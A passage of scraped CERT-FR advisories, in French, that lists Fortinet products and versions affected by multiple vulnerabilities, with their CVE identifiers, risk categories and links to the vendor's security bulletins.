| Fortinet | FortiClient | Fortinet FortiClient versions antérieures à 6.4.7 | ||
| Fortinet | FortiSOAR | Fortinet FortiSOAR versions antérieures à 7.2.0 | ||
| Fortinet | FortiProxy | Fortinet FortiProxy versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiClient | Fortinet FortiClient versions 7.x antérieures à 7.0.3 | ||
| Fortinet | N/A | Fortinet FortiFone versions antérieures à 3.0.12 | ||
| Fortinet | FortiGate | Fortinet FortiGate versions antérieures à 6.4.9 | ||
| Fortinet | FortiNAC | Fortinet FortiNAC versions 10.x antérieures à 10.0.0 | ||
| Fortinet | FortiOS | Fortinet FortiOS versions antérieures à 6.4.9 | ||
| Fortinet | FortiNAC | Fortinet FortiNAC versions antérieures à 9.1.6 | ||
| Fortinet | FortiOS | Fortinet FortiOS versions 7.0.x antérieures à 7.0.4 ou 7.2.0 |
References
| Title | Publication Time | Tags | |||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
|||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "Fortinet FortiNAC versions 9.2.x ant\u00e9rieures \u00e0 9.2.3",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiNAC versions 9.4.x ant\u00e9rieures \u00e0 9.4.0",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiGate versions 7.0.x ant\u00e9rieures \u00e0 7.0.4",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiIsolator versions ant\u00e9rieures \u00e0 2.3.3 ou 2.4.0",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiProxy versions 2.0.x ant\u00e9rieures \u00e0 2.0.8",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiClient versions ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiSOAR versions ant\u00e9rieures \u00e0 7.2.0",
"product": {
"name": "FortiSOAR",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiProxy versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiClient versions 7.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiFone versions ant\u00e9rieures \u00e0 3.0.12",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiGate versions ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiNAC versions 10.x ant\u00e9rieures \u00e0 10.0.0",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiOS versions ant\u00e9rieures \u00e0 6.4.9",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiNAC versions ant\u00e9rieures \u00e0 9.1.6",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Fortinet FortiOS versions 7.0.x ant\u00e9rieures \u00e0 7.0.4 ou 7.2.0",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2021-43845",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43845"
},
{
"name": "CVE-2021-21375",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-21375"
},
{
"name": "CVE-2020-15260",
"url": "https://www.cve.org/CVERecord?id=CVE-2020-15260"
},
{
"name": "CVE-2021-37706",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-37706"
},
{
"name": "CVE-2022-26116",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-26116"
},
{
"name": "CVE-2021-43081",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43081"
},
{
"name": "CVE-2022-23443",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-23443"
},
{
"name": "CVE-2021-43804",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43804"
},
{
"name": "CVE-2021-43066",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43066"
},
{
"name": "CVE-2021-32686",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32686"
},
{
"name": "CVE-2022-22306",
"url": "https://www.cve.org/CVERecord?id=CVE-2022-22306"
},
{
"name": "CVE-2021-41020",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41020"
},
{
"name": "CVE-2021-43206",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43206"
},
{
"name": "CVE-2021-41032",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41032"
}
],
"initial_release_date": "2022-05-04T00:00:00",
"last_revision_date": "2022-05-04T00:00:00",
"links": [],
"reference": "CERTFR-2022-AVI-410",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2022-05-04T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, un d\u00e9ni de service \u00e0\ndistance et un contournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-062 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-062"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-231 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-231"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-041 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-041"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-147 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-147"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-040 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-040"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-230 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-230"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-239 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-239"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-154 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-154"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-22-007 du 03 mai 2022",
"url": "https://www.fortiguard.com/psirt/FG-IR-22-007"
}
]
}
CERTFR-2021-AVI-927
Vulnerability from certfr_avis - Published: 2021-12-08 - Updated: 2021-12-08
De multiples vulnérabilités ont été découvertes dans les produits Fortinet. Certaines d'entre elles permettent à un attaquant de provoquer une exécution de code arbitraire à distance, une atteinte à l'intégrité des données, une atteinte à la confidentialité des données et un contournement de la politique de sécurité.
Solution
Se référer au bulletin de sécurité de l'éditeur pour l'obtention des correctifs (cf. section Documentation).
NoneImpacted products
| Vendor | Product | Description | ||
|---|---|---|---|---|
| Fortinet | FortiGate | FortiGate versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiClient | FortiClient pour Linux, Mac et Windows versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiGate | FortiGate versions 6.4.x antérieures à 6.4.7 | ||
| Fortinet | FortiProxy | FortiProxy versions 1.x antérieures à 1.2.12 | ||
| Fortinet | FortiOS | FortiOS versions 6.2.x antérieures à 6.2.10 | ||
| Fortinet | FortiNAC | FortiNAC versions 8.8.x antérieures à 8.8.10 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.4.x antérieures à 6.4.2 | ||
| Fortinet | FortiOS | FortiOS versions 7.0.x antérieures à 7.0.3 | ||
| Fortinet | FortiADC | FortiADC versions 6.1.x antérieures à 6.1.4 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.2.x antérieures à 6.2.6 | ||
| Fortinet | FortiSandbox | FortiSandbox versions 3.x antérieures à 3.2.3 | ||
| Fortinet | FortiGate | FortiGate versions 6.2.x antérieures à 6.2.10 | ||
| Fortinet | FortiOS | FortiOS versions 5.6.x antérieures à 5.6.14 | ||
| Fortinet | FortiOS | FortiOS versions 6.4.x antérieures à 6.4.8 | ||
| Fortinet | FortiOS | FortiOS versions 6.0.x antérieures à 6.0.14 | ||
| Fortinet | FortiADC | FortiADC version 6.2.x antérieures à 6.2.1 | ||
| Fortinet | FortiClient | FortiClient pour Linux, Mac et Windows versions 6.4.x antérieures à 6.4.7 | ||
| Fortinet | FortiProxy | FortiProxy versions 2.x antérieures à 2.0.4 | ||
| Fortinet | FortiWeb | FortiWeb versions 6.3.x antérieures à 6.3.16 | ||
| Fortinet | FortiOS | FortiOS-6K7K versions 6.4.x antérieures à 6.4.3 | ||
| Fortinet | FortiSandbox | FortiSandbox versions 4.x antérieures à 4.0.1 | ||
| Fortinet | FortiClientEMS | FortiClientEMS versions 7.0.x antérieures à 7.0.2 | ||
| Fortinet | FortiClientEMS | FortiClientEMS versions 6.4.x antérieures à 6.4.7 | ||
| Fortinet | N/A | Meru AP versions antérieures à 8.6.2 | ||
| Fortinet | FortiProxy | FortiProxy versions 7.x antérieures à 7.0.1 | ||
| Fortinet | N/A | FortiWLC versions antérieures à 8.6.2 | ||
| Fortinet | FortiNAC | FortiNAC versions 9.2.x antérieures à 9.2.1 | ||
| Fortinet | FortiNAC | FortiNAC versions 9.1.x antérieures à 9.1.4 | ||
| Fortinet | N/A | FortiAuthenticator versions antérieures à 6.4.1 | ||
| Fortinet | FortiOS | FortiOS-6K7K versions 6.2.x antérieures à 6.2.8 |
References
| Title | Publication Time | Tags | ||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
|
||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||||
{
"$ref": "https://www.cert.ssi.gouv.fr/openapi.json",
"affected_systems": [
{
"description": "FortiGate versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClient pour Linux, Mac et Windows versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.4.x ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 1.x ant\u00e9rieures \u00e0 1.2.12",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.2.x ant\u00e9rieures \u00e0 6.2.10",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions 8.8.x ant\u00e9rieures \u00e0 8.8.10",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.4.x ant\u00e9rieures \u00e0 6.4.2",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 7.0.x ant\u00e9rieures \u00e0 7.0.3",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC versions 6.1.x ant\u00e9rieures \u00e0 6.1.4",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.2.x ant\u00e9rieures \u00e0 6.2.6",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSandbox versions 3.x ant\u00e9rieures \u00e0 3.2.3",
"product": {
"name": "FortiSandbox",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiGate versions 6.2.x ant\u00e9rieures \u00e0 6.2.10",
"product": {
"name": "FortiGate",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 5.6.x ant\u00e9rieures \u00e0 5.6.14",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.4.x ant\u00e9rieures \u00e0 6.4.8",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS versions 6.0.x ant\u00e9rieures \u00e0 6.0.14",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiADC version 6.2.x ant\u00e9rieures \u00e0 6.2.1",
"product": {
"name": "FortiADC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClient pour Linux, Mac et Windows versions 6.4.x ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiClient",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 2.x ant\u00e9rieures \u00e0 2.0.4",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWeb versions 6.3.x ant\u00e9rieures \u00e0 6.3.16",
"product": {
"name": "FortiWeb",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS-6K7K versions 6.4.x ant\u00e9rieures \u00e0 6.4.3",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiSandbox versions 4.x ant\u00e9rieures \u00e0 4.0.1",
"product": {
"name": "FortiSandbox",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientEMS versions 7.0.x ant\u00e9rieures \u00e0 7.0.2",
"product": {
"name": "FortiClientEMS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiClientEMS versions 6.4.x ant\u00e9rieures \u00e0 6.4.7",
"product": {
"name": "FortiClientEMS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "Meru AP versions ant\u00e9rieures \u00e0 8.6.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiProxy versions 7.x ant\u00e9rieures \u00e0 7.0.1",
"product": {
"name": "FortiProxy",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiWLC versions ant\u00e9rieures \u00e0 8.6.2",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions 9.2.x ant\u00e9rieures \u00e0 9.2.1",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiNAC versions 9.1.x ant\u00e9rieures \u00e0 9.1.4",
"product": {
"name": "FortiNAC",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiAuthenticator versions ant\u00e9rieures \u00e0 6.4.1",
"product": {
"name": "N/A",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
},
{
"description": "FortiOS-6K7K versions 6.2.x ant\u00e9rieures \u00e0 6.2.8",
"product": {
"name": "FortiOS",
"vendor": {
"name": "Fortinet",
"scada": false
}
}
}
],
"affected_systems_content": null,
"content": "## Solution\n\nSe r\u00e9f\u00e9rer au bulletin de s\u00e9curit\u00e9 de l\u0027\u00e9diteur pour l\u0027obtention des\ncorrectifs (cf. section Documentation).\n",
"cves": [
{
"name": "CVE-2021-43068",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43068"
},
{
"name": "CVE-2021-44168",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-44168"
},
{
"name": "CVE-2021-36194",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36194"
},
{
"name": "CVE-2021-41028",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41028"
},
{
"name": "CVE-2021-36195",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36195"
},
{
"name": "CVE-2021-41014",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41014"
},
{
"name": "CVE-2021-41030",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41030"
},
{
"name": "CVE-2021-43067",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43067"
},
{
"name": "CVE-2021-41017",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41017"
},
{
"name": "CVE-2021-43064",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43064"
},
{
"name": "CVE-2021-41021",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41021"
},
{
"name": "CVE-2021-42759",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42759"
},
{
"name": "CVE-2021-43071",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43071"
},
{
"name": "CVE-2021-36173",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36173"
},
{
"name": "CVE-2021-41024",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41024"
},
{
"name": "CVE-2021-42752",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42752"
},
{
"name": "CVE-2021-41025",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41025"
},
{
"name": "CVE-2021-41015",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41015"
},
{
"name": "CVE-2021-43065",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43065"
},
{
"name": "CVE-2021-26110",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26110"
},
{
"name": "CVE-2021-41013",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41013"
},
{
"name": "CVE-2021-26108",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26108"
},
{
"name": "CVE-2021-43204",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43204"
},
{
"name": "CVE-2021-42758",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42758"
},
{
"name": "CVE-2021-41029",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41029"
},
{
"name": "CVE-2021-42760",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42760"
},
{
"name": "CVE-2021-41026",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41026"
},
{
"name": "CVE-2021-41027",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-41027"
},
{
"name": "CVE-2021-36189",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36189"
},
{
"name": "CVE-2021-36180",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36180"
},
{
"name": "CVE-2021-36191",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36191"
},
{
"name": "CVE-2021-42757",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-42757"
},
{
"name": "CVE-2021-32591",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-32591"
},
{
"name": "CVE-2021-36190",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36190"
},
{
"name": "CVE-2021-26109",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26109"
},
{
"name": "CVE-2021-26103",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-26103"
},
{
"name": "CVE-2021-36167",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36167"
},
{
"name": "CVE-2021-43063",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-43063"
},
{
"name": "CVE-2021-36188",
"url": "https://www.cve.org/CVERecord?id=CVE-2021-36188"
}
],
"initial_release_date": "2021-12-08T00:00:00",
"last_revision_date": "2021-12-08T00:00:00",
"links": [],
"reference": "CERTFR-2021-AVI-927",
"revisions": [
{
"description": "Version initiale",
"revision_date": "2021-12-08T00:00:00.000000"
}
],
"risks": [
{
"description": "D\u00e9ni de service \u00e0 distance"
},
{
"description": "Injection de code indirecte \u00e0 distance (XSS)"
},
{
"description": "Injection de requ\u00eates ill\u00e9gitimes par rebond (CSRF)"
},
{
"description": "Ex\u00e9cution de code arbitraire \u00e0 distance"
},
{
"description": "Atteinte \u00e0 l\u0027int\u00e9grit\u00e9 des donn\u00e9es"
},
{
"description": "Contournement de la politique de s\u00e9curit\u00e9"
},
{
"description": "Atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es"
},
{
"description": "\u00c9l\u00e9vation de privil\u00e8ges"
}
],
"summary": "De multiples vuln\u00e9rabilit\u00e9s ont \u00e9t\u00e9 d\u00e9couvertes dans les produits\nFortinet. Certaines d\u0027entre elles permettent \u00e0 un attaquant de provoquer\nune ex\u00e9cution de code arbitraire \u00e0 distance, une atteinte \u00e0 l\u0027int\u00e9grit\u00e9\ndes donn\u00e9es, une atteinte \u00e0 la confidentialit\u00e9 des donn\u00e9es et un\ncontournement de la politique de s\u00e9curit\u00e9.\n",
"title": "Multiples vuln\u00e9rabilit\u00e9s dans les produits Fortinet",
"vendor_advisories": [
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-201 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-201"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-130 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-130"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-134 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-134"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-049 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-049"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-075 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-075"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-122 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-122"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-140 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-140"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-051 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-051"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-192 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-192"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-138 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-138"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-152 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-152"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-127 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-127"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-120 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-120"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-222 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-222"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-118 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-118"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-212 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-212"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-133 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-133"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-20-131 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-20-131"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-173 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-173"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-182 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-182"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-114 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-114"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-111 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-111"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-115 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-115"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-123 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-123"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-181 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-181"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-160 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-160"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-129 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-129"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-200 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-200"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-167 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-167"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-157 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-157"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-139 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-139"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-168 du 8 d\u00e9cembre 2021",
"url": "https://www.fortiguard.com/psirt/FG-IR-21-168"
},
{
"published_at": null,
"title": "Bulletin de s\u00e9curit\u00e9 Fortinet FG-IR-21-156 du 8 d\u00e9cembre 2021",
